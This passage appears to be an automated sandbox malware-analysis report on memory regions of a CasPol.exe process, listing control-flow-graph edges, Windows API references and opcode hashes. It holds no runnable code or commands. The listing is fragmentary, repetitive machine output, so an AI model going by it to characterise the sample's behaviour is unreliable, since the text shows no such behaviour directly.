1fbc6bcd-1fbc6bf2 call 1fbc6460 1609->1613 1610->1598 1616 1fbc7462-1fbc75a8 1611->1616 1612->1611 1614 1fbc6db9-1fbc6dbf 1612->1614 1627 1fbc6bf4-1fbc6bf7 1613->1627 1628 1fbc6c01-1fbc6c0d 1613->1628 1617 1fbc740f-1fbc7414 1614->1617 1618 1fbc6dc5 1614->1618 1632 1fbc75ab-1fbc75ed 1616->1632 1620 1fbc741b-1fbc745c 1617->1620 1621 1fbc7416-1fbc7419 1617->1621 1618->1617 1621->1616 1621->1620 1627->1628 1629 1fbc6c0f-1fbc6c1d 1628->1629 1630 1fbc6c22-1fbc6c27 1628->1630 1629->1598 1633 1fbc6c2d-1fbc6c30 1630->1633 1634 1fbc6cf7 1630->1634 1632->1632 1635 1fbc75ef-1fbc7600 1632->1635 1633->1634 1638 1fbc6c36-1fbc6c4c 1633->1638 1634->1574 1639 1fbc7607-1fbc7610 1635->1639 1638->1577 1645 1fbc6c52-1fbc6c5b 1638->1645 1641 1fbc7613-1fbc7614 1639->1641 1642 1fbc7617-1fbc7618 1641->1642 1644 1fbc761b-1fbc761c 1642->1644 1646 1fbc761f-1fbc7620 1644->1646 1645->1577 1647 1fbc6c61-1fbc6c6d 1645->1647 1648 1fbc7623-1fbc7624 1646->1648 1647->1577 1649 1fbc6c73-1fbc6c7c 1647->1649 1650 1fbc7627-1fbc7628 1648->1650 1649->1634 1651 1fbc6c7e-1fbc6c8a 1649->1651 1652 1fbc762b-1fbc762c 1650->1652 1653 1fbc6c8c 1651->1653 1654 1fbc6ce4-1fbc6ce7 1651->1654 1655 1fbc762f-1fbc7630 1652->1655 1656 1fbc6c8f-1fbc6c94 1653->1656 1654->1598 1657 1fbc7633-1fbc7649 1655->1657 1656->1577 1658 1fbc6c9a-1fbc6cbb call 1fbc6460 1656->1658 1657->1639 1659 1fbc764b-1fbc7655 1657->1659 1666 1fbc6cbd-1fbc6cbf 1658->1666 1667 1fbc6cc9-1fbc6cd4 1658->1667 1659->1641 1661 1fbc7657-1fbc7659 1659->1661 1661->1642 1663 1fbc765b-1fbc765d 1661->1663 1663->1644 1665 1fbc765f-1fbc7661 1663->1665 1665->1646 1668 1fbc7663-1fbc7665 1665->1668 1666->1667 1667->1577 1669 1fbc6cd6-1fbc6cdd 1667->1669 1668->1648 1670 1fbc7667-1fbc7669 1668->1670 1669->1634 1671 1fbc6cdf-1fbc6ce2 1669->1671 1670->1650 1672 1fbc766b-1fbc766d 1670->1672 1671->1654 1671->1656 1672->1652 1673 1fbc766f-1fbc7671 1672->1673 1673->1655 1674 1fbc7673-1fbc7675 1673->1674 1674->1657 1675 1fbc7677-1fbc7688 1674->1675
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Xk$Xk
                                                                                      • API String ID: 0-2435460274
                                                                                      • Opcode ID: ac02eaccefde1c2c063fd0b02f55afb2613611175152238b395195acde787410
                                                                                      • Instruction ID: ff2b14552d1c64d26fc49dde8db47c8334cdd2c3cfcd6fa664634c38d93115bd
                                                                                      • Opcode Fuzzy Hash: ac02eaccefde1c2c063fd0b02f55afb2613611175152238b395195acde787410
                                                                                      • Instruction Fuzzy Hash: E6E11475A0494187CB058F68E141AEBBBB3EF84255F70812ACE0C4B79AEF31EC55C791
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 3178 1fbc2b10-1fbc2b2d 3179 1fbc2b2f-1fbc2b33 3178->3179 3180 1fbc2b35-1fbc2b37 3178->3180 3179->3180 3181 1fbc2b3c-1fbc2b47 3179->3181 3182 1fbc2d48-1fbc2d4f 3180->3182 3183 1fbc2b4d-1fbc2b54 3181->3183 3184 1fbc2d50 3181->3184 3185 1fbc2ce9-1fbc2cef 3183->3185 3186 1fbc2b5a-1fbc2b69 3183->3186 3187 1fbc2d55-1fbc2d6d 3184->3187 3189 1fbc2cf5-1fbc2cf9 3185->3189 3190 1fbc2cf1-1fbc2cf3 3185->3190 3186->3187 3188 1fbc2b6f-1fbc2b7e 3186->3188 3197 1fbc2d6f-1fbc2d8d 3187->3197 3198 1fbc2d18-1fbc2d1d 3187->3198 3199 1fbc2b80-1fbc2b83 3188->3199 3200 1fbc2b93-1fbc2b96 3188->3200 3191 1fbc2cfb-1fbc2d01 3189->3191 3192 1fbc2d46 3189->3192 3190->3182 3191->3184 3193 1fbc2d03-1fbc2d06 3191->3193 3192->3182 3193->3184 3196 1fbc2d08-1fbc2d17 3193->3196 3196->3198 3225 1fbc2d8f-1fbc2d94 3197->3225 3226 1fbc2d96-1fbc2d9a 3197->3226 3205 1fbc2d1f-1fbc2d25 3198->3205 3206 1fbc2d41-1fbc2d44 3198->3206 3201 1fbc2b85-1fbc2b88 3199->3201 3202 1fbc2ba2-1fbc2ba8 3199->3202 3200->3202 3203 1fbc2b98-1fbc2b9b 3200->3203 3207 1fbc2b8e 3201->3207 3208 1fbc2c89-1fbc2c8f 3201->3208 3212 1fbc2baa-1fbc2bb0 3202->3212 3213 1fbc2bc0-1fbc2bc8 3202->3213 3210 1fbc2b9d 3203->3210 3211 1fbc2bee-1fbc2bf4 3203->3211 3214 1fbc2d37-1fbc2d3a 3205->3214 3215 1fbc2d27-1fbc2d35 3205->3215 3206->3182 3216 1fbc2cb4-1fbc2cc1 3207->3216 3223 1fbc2ca7-1fbc2cb1 3208->3223 3224 1fbc2c91-1fbc2c97 3208->3224 3210->3216 3218 1fbc2c0c-1fbc2c1e 3211->3218 3219 1fbc2bf6-1fbc2bfc 3211->3219 3220 1fbc2bb4-1fbc2bbe 3212->3220 3221 1fbc2bb2 3212->3221 3232 1fbc2bce-1fbc2be9 3213->3232 3214->3184 3222 1fbc2d3c-1fbc2d3f 3214->3222 3215->3184 3215->3214 3240 1fbc2cd5-1fbc2cd7 3216->3240 3241 1fbc2cc3-1fbc2cc7 3216->3241 3244 1fbc2c2e-1fbc2c51 3218->3244 3245 1fbc2c20-1fbc2c2c 3218->3245 3227 1fbc2bfe 3219->3227 3228 1fbc2c00-1fbc2c0a 3219->3228 3220->3213 3221->3213 3222->3205 3222->3206 3223->3216 3230 1fbc2c99 3224->3230 3231 1fbc2c9b-1fbc2ca5 3224->3231 3234 1fbc2da0-1fbc2da2 3225->3234 3226->3234 3227->3218 3228->3218 3230->3223 3231->3223 3232->3216 3242 1fbc2da4-1fbc2db6 3234->3242 3243 1fbc2db7-1fbc2dbe 3234->3243 3248 1fbc2cdb-1fbc2cde 3240->3248 3241->3240 3247 1fbc2cc9-1fbc2ccd 3241->3247 3244->3184 3257 1fbc2c57-1fbc2c5a 3244->3257 3255 1fbc2c79-1fbc2c87 3245->3255 3247->3184 3251 1fbc2cd3 3247->3251 3248->3184 3253 1fbc2ce0-1fbc2ce3 3248->3253 3251->3248 3253->3185 3253->3186 3255->3216 3257->3184 3259 1fbc2c60-1fbc2c72 3257->3259 3259->3255
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ,k$,k
                                                                                      • API String ID: 0-2928433764
                                                                                      • Opcode ID: 2cad1ad9d2920db90cb658a4b72bd07311026969972b62797d05bde0e7463560
                                                                                      • Instruction ID: 4e6766e13ee64096931c716e4979532a878b44ad6acc1ab70746d8590b835996
                                                                                      • Opcode Fuzzy Hash: 2cad1ad9d2920db90cb658a4b72bd07311026969972b62797d05bde0e7463560
                                                                                      • Instruction Fuzzy Hash: 9281C134B04501CFDB04CF78E880A9BB7B2FF89315B158269D91ADB765DB31E841CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 3261 1fbc2712-1fbc273a 3262 1fbc273c-1fbc2740 3261->3262 3263 1fbc2750-1fbc275b 3261->3263 3264 1fbc2768-1fbc276f 3262->3264 3265 1fbc2742-1fbc274e 3262->3265 3266 1fbc2761-1fbc2763 3263->3266 3267 1fbc2803-1fbc2826 3263->3267 3268 1fbc278f-1fbc2798 3264->3268 3269 1fbc2771-1fbc2778 3264->3269 3265->3263 3265->3264 3270 1fbc27fb-1fbc2800 3266->3270 3285 1fbc2828-1fbc282f 3267->3285 3373 1fbc279a call 1fbc2718 3268->3373 3374 1fbc279a call 1fbc2880 3268->3374 3375 1fbc279a call 1fbc2712 3268->3375 3269->3268 3271 1fbc277a-1fbc2785 3269->3271 3273 1fbc278b-1fbc278d 3271->3273 3274 1fbc2836-1fbc287d 3271->3274 3273->3270 3274->3285 3294 1fbc287f-1fbc288e 3274->3294 3275 1fbc27a0-1fbc27a2 3276 1fbc27aa-1fbc27b2 3275->3276 3277 1fbc27a4-1fbc27a8 3275->3277 3281 1fbc27b4-1fbc27b9 3276->3281 3282 1fbc27c1-1fbc27c3 3276->3282 3277->3276 3280 1fbc27c5-1fbc27d6 3277->3280 3376 1fbc27d9 call 1fbc3038 3280->3376 3377 1fbc27d9 call 1fbc3028 3280->3377 3281->3282 3282->3270 3285->3274 3286 1fbc27df-1fbc27e4 3287 1fbc27f9 3286->3287 3288 1fbc27e6-1fbc27ef 3286->3288 3287->3270 3366 1fbc27f1 call 1fbc5258 3288->3366 3367 1fbc27f1 call 1fbc5217 3288->3367 3291 1fbc27f7 3291->3270 3296 1fbc289d-1fbc28ae 3294->3296 3297 1fbc2890-1fbc2896 3294->3297 3299 1fbc28b4-1fbc28b8 3296->3299 3300 1fbc2941-1fbc2943 3296->3300 3297->3296 3301 1fbc28c8-1fbc28d5 3299->3301 3302 1fbc28ba-1fbc28c6 3299->3302 3368 1fbc2945 call 1fbc2718 3300->3368 3369 1fbc2945 call 1fbc2a30 3300->3369 3370 1fbc2945 call 1fbc2880 3300->3370 3371 1fbc2945 call 1fbc2712 3300->3371 3308 1fbc28d7-1fbc28e0 3301->3308 3302->3308 3303 1fbc294b-1fbc2951 3306 1fbc295d-1fbc2964 3303->3306 3307 1fbc2953-1fbc2959 3303->3307 3309 1fbc29bf-1fbc2a1e 3307->3309 3310 1fbc295b 3307->3310 3313 1fbc290d-1fbc2911 3308->3313 3314 1fbc28e2-1fbc28f1 3308->3314 3323 1fbc2a25-1fbc2a56 3309->3323 3310->3306 3315 1fbc291d-1fbc2921 3313->3315 3316 1fbc2913-1fbc2919 3313->3316 3325 1fbc2901-1fbc290b 3314->3325 3326 1fbc28f3-1fbc28fa 3314->3326 3315->3306 3320 1fbc2923-1fbc2927 3315->3320 3318 1fbc291b 3316->3318 3319 1fbc2967-1fbc29b8 3316->3319 3318->3306 3319->3309 3322 1fbc292d-1fbc293f 3320->3322 3320->3323 3322->3306 3336 1fbc2a58-1fbc2a65 3323->3336 3337 1fbc2a7b-1fbc2a80 3323->3337 3325->3313 3326->3325 3343 1fbc2a77-1fbc2a79 3336->3343 3344 1fbc2a67-1fbc2a75 3336->3344 3341 1fbc2a88 3337->3341 3342 1fbc2a8a 3341->3342 3378 1fbc2a8c call 1d723ef0 3342->3378 3379 1fbc2a8c call 1d723fb8 3342->3379 3343->3342 3344->3342 3348 1fbc2a91-1fbc2a93 3350 1fbc2abb-1fbc2ac7 call 1fbc2b10 3348->3350 3351 1fbc2a95-1fbc2aa3 3348->3351 3356 1fbc2ac9-1fbc2ade 3350->3356 3357 1fbc2ae0-1fbc2ae4 3350->3357 3358 1fbc2aa5-1fbc2aa9 3351->3358 3359 1fbc2ab0-1fbc2ab9 3351->3359 3362 1fbc2b02-1fbc2b08 3356->3362 3361 1fbc2ae6-1fbc2afb 3357->3361 3357->3362 3358->3359 3359->3350 3361->3362 3366->3291 3367->3291 3368->3303 3369->3303 3370->3303 3371->3303 3373->3275 3374->3275 3375->3275 3376->3286 3377->3286 3378->3348 3379->3348
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6114002757.000000001FBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FBC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1fbc0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Hk$Hk
                                                                                      • API String ID: 0-4206920932
                                                                                      • Opcode ID: 3c709f3f17815e2c735f26dc4ca8a1f8f4c3044e7cdbf1242cb9340b984fe42f
                                                                                      • Instruction ID: ca0d739770ef02401c38c96a86347dbcac4ebbdae5091963c5641fe9d64165b3
                                                                                      • Opcode Fuzzy Hash: 3c709f3f17815e2c735f26dc4ca8a1f8f4c3044e7cdbf1242cb9340b984fe42f
                                                                                      • Instruction Fuzzy Hash: 4D51E1353082658FDB058F25E894BAF7BE6FF89314F018529E949CB391DB79AC01C7A1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D72F065
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6084786549.000000001D720000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D720000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1d720000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: fcb2a403ce50b5f44c43e5be62a04687fe213dd7709ba6fba8cb80a54d02e4f1
                                                                                      • Instruction ID: cafb3aadbb3e42678347a103b551221efa31e14b3279cfb2c3c4f2c70e0eab97
                                                                                      • Opcode Fuzzy Hash: fcb2a403ce50b5f44c43e5be62a04687fe213dd7709ba6fba8cb80a54d02e4f1
                                                                                      • Instruction Fuzzy Hash: 2E029674945378CFCB65EF21C98868AB771BF49715F5081EAD80AA3354CB329E86CF42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D72F065
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6084786549.000000001D720000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D720000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1d720000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: fc55c5d9f75e018d3e3edeac35dffc2ddc6e2ac7edadc54ae3f902c2e9892899
                                                                                      • Instruction ID: 94808b87d0998368346d47413c025ab303e2ce5b002e994d0d4c3f2838b78e83
                                                                                      • Opcode Fuzzy Hash: fc55c5d9f75e018d3e3edeac35dffc2ddc6e2ac7edadc54ae3f902c2e9892899
                                                                                      • Instruction Fuzzy Hash: DA029674941378CFCB65EF21C98868AB771BF49715F5042EAD80AA3358CB325E86CF42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D72F065
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6084786549.000000001D720000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D720000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1d720000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: deb26d5d53f4c202f444b03dda620cbc2c004d1ffce2c18c8259cfe85b4ff22a
                                                                                      • Instruction ID: 7ff9776ab427c47760200d69c05e89ddeab76ecd9afbfbae49279a7fea471920
                                                                                      • Opcode Fuzzy Hash: deb26d5d53f4c202f444b03dda620cbc2c004d1ffce2c18c8259cfe85b4ff22a
                                                                                      • Instruction Fuzzy Hash: 1A029574945378CFCB65EF21C98868AB771BF49715F5042EAD80AA3354CB329E86CF42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D72F065
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6084786549.000000001D720000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D720000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1d720000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: d2e76e99014e593387050c8a37454699a5d5e7181051a6f387306155202e3140
                                                                                      • Instruction ID: c116af570b8ba69c6aefbfdf91a4c61aeefb74028b97fe2e8a2667a79bd5ac8a
                                                                                      • Opcode Fuzzy Hash: d2e76e99014e593387050c8a37454699a5d5e7181051a6f387306155202e3140
                                                                                      • Instruction Fuzzy Hash: 5F029574945378CFCB65EF21C98868AB771BF49715F5042EAD80AA3354CB329E86CF42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D72F065
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6084786549.000000001D720000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D720000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1d720000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: 0cbdb23a4f66c0fd351d9b6e61d1086d7377e0745d5a712b892cd0931f7ef4c2
                                                                                      • Instruction ID: d190f749986e52a5a7697764d487d17a5778100da7dc9d026b338c1c2640e3b3
                                                                                      • Opcode Fuzzy Hash: 0cbdb23a4f66c0fd351d9b6e61d1086d7377e0745d5a712b892cd0931f7ef4c2
                                                                                      • Instruction Fuzzy Hash: 38029674945378CFCB65EF21C98868AB771BF49715F5042EAD80AA3354CB329E86CF42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D72F065
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6084786549.000000001D720000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D720000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1d720000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: 13e03a540cd52d917e729de9a14ea4e54929f8c03330ed4630cfe6c3e7cd8c7e
                                                                                      • Instruction ID: c3ed374218fec5d683c843c9e5e667710b611334a1a812f0bc1f705e23141c47
                                                                                      • Opcode Fuzzy Hash: 13e03a540cd52d917e729de9a14ea4e54929f8c03330ed4630cfe6c3e7cd8c7e
                                                                                      • Instruction Fuzzy Hash: 04F19674945378CFCB65EF21C98868AB771BF49715F5082EAD80AA3354CB325E86CF42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D72F065
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6084786549.000000001D720000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D720000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1d720000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: ac69bb546e77235d6770166348a9dc3ed34ab6f643cd831e6b9aa31925634ecc
                                                                                      • Instruction ID: 02414a24f84bb89fd9e3e34007e1202113b9c595762fc744179e3fe289c64de5
                                                                                      • Opcode Fuzzy Hash: ac69bb546e77235d6770166348a9dc3ed34ab6f643cd831e6b9aa31925634ecc
                                                                                      • Instruction Fuzzy Hash: 2AF19574945378CFCB65EF21C98868AB771BF49715F5042EAD80AA3354CB329E86CF42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D72F065
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6084786549.000000001D720000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D720000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1d720000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: af70335d9f11be74fa4b70c100aec69c61966b82bc262746e8e8836587ea736d
                                                                                      • Instruction ID: d4a7bf94d4800b23aa1f7880b6744c2e0bc0cdd9a42849646bdc419c1c42430d
                                                                                      • Opcode Fuzzy Hash: af70335d9f11be74fa4b70c100aec69c61966b82bc262746e8e8836587ea736d
                                                                                      • Instruction Fuzzy Hash: 4BF19574945378CFCB65EF21C98868AB771BF49715F5082EAD80AA3354CB325E86CF02
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D72F065
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6084786549.000000001D720000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D720000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1d720000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: 31ee8a52b17bf45d85602a82dc1523afa1d6e0a5a45de229c5f8409d89feddc2
                                                                                      • Instruction ID: 6bf734c8166487e9ba6423dbd3a7d1a01246efbe63fc65d74816661bc9152a27
                                                                                      • Opcode Fuzzy Hash: 31ee8a52b17bf45d85602a82dc1523afa1d6e0a5a45de229c5f8409d89feddc2
                                                                                      • Instruction Fuzzy Hash: D5F19474945378CFCB65EF21C98868AB771BF49715F5042EAD80AA3354CB329E86CF42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D72F065
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6084786549.000000001D720000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D720000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1d720000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: 0aa68fbfe5e3fa68637ad5e2ac1c727ad459a0ebec2a5352317691bcb5b4c2f6
                                                                                      • Instruction ID: def365800aeb841070dc8439959f3ad2a2eb4f29ca653a81669c3423a2a1647d
                                                                                      • Opcode Fuzzy Hash: 0aa68fbfe5e3fa68637ad5e2ac1c727ad459a0ebec2a5352317691bcb5b4c2f6
                                                                                      • Instruction Fuzzy Hash: DCE1A574945378CFCB65EF21C98868AB771BF49715F5042EAD80AA3354CB329E86CF42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D72F065
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6084786549.000000001D720000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D720000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1d720000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: b6d3e200f301fcf23db8d85c4e26df4f49f66b3a7fcdf62172ac27de4c26235b
                                                                                      • Instruction ID: 00dd8ffa9ae46c684d3c1966d6851495db9bf9e20a144c5e8c06b46f7c55ce99
                                                                                      • Opcode Fuzzy Hash: b6d3e200f301fcf23db8d85c4e26df4f49f66b3a7fcdf62172ac27de4c26235b
                                                                                      • Instruction Fuzzy Hash: 73E19474945378CFCB65EF21C98868AB771BF49715F5042EAD80AA3354CB329E86CF02
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 1D72F065
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6084786549.000000001D720000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D720000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_1d720000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: 1610e5dfaf378df28af33d56f07dce5b50cc1b0c3ca1bbbfe9883fc2afe4053d
                                                                                      • Instruction ID: 1515cfb98aba0bf967ee440c9cb2902926e3b3adf216ecca9550abfa136d5d30
                                                                                      • Opcode Fuzzy Hash: 1610e5dfaf378df28af33d56f07dce5b50cc1b0c3ca1bbbfe9883fc2afe4053d
                                                                                      • Instruction Fuzzy Hash: 61E19574945378CFCB65EF61C98868AB771BF49715F5042EAD80AA3354CB329E86CF02
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 2089686A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6116066635.0000000020890000.00000040.00000800.00020000.00000000.sdmp, Offset: 20890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_20890000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateWindow
                                                                                      • String ID:
                                                                                      • API String ID: 716092398-0
                                                                                      • Opcode ID: f81439112a010f437bd618359660e351771c8333df5864a7d363c954c5a91789
                                                                                      • Instruction ID: ebb2ae49e840b448924c158c9498a79ff62d1d88347247301add2f91d4f52346
                                                                                      • Opcode Fuzzy Hash: f81439112a010f437bd618359660e351771c8333df5864a7d363c954c5a91789
                                                                                      • Instruction Fuzzy Hash: 6151D0B1C00249EFDB15DFE9D884ADEBBB1FF49304F14822AE818AB211D7759855CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 2089686A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6116066635.0000000020890000.00000040.00000800.00020000.00000000.sdmp, Offset: 20890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_20890000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateWindow
                                                                                      • String ID:
                                                                                      • API String ID: 716092398-0
                                                                                      • Opcode ID: 9294cea530cc20be38efbd46d67369298818a70c6105594924ccc9dc99ca30da
                                                                                      • Instruction ID: 5b6b33865b6cc827444afc5b613e803906406ac5e460a2f3a0bb8ee23ffb7113
                                                                                      • Opcode Fuzzy Hash: 9294cea530cc20be38efbd46d67369298818a70c6105594924ccc9dc99ca30da
                                                                                      • Instruction Fuzzy Hash: A551AEB1D00249EFDB14DFD9C884ADEBBB5FF48314F24862AE818AB210D7759855CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 2089B721
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6116066635.0000000020890000.00000040.00000800.00020000.00000000.sdmp, Offset: 20890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_20890000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallProcWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2714655100-0
                                                                                      • Opcode ID: 27967731b5e23b4a7f9d9de079fb06971c17de72ffae1d06be7f2b3187072522
                                                                                      • Instruction ID: ef3ee8be8824debee6ac60ac3b05d030eab70c013885c2dbb76312b7f05a1e99
                                                                                      • Opcode Fuzzy Hash: 27967731b5e23b4a7f9d9de079fb06971c17de72ffae1d06be7f2b3187072522
                                                                                      • Instruction Fuzzy Hash: E5415AB8900309DFCB00DF99C588EABBBF5FF88314F248558E519AB321D774A841CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.6116066635.0000000020890000.00000040.00000800.00020000.00000000.sdmp, Offset: 20890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
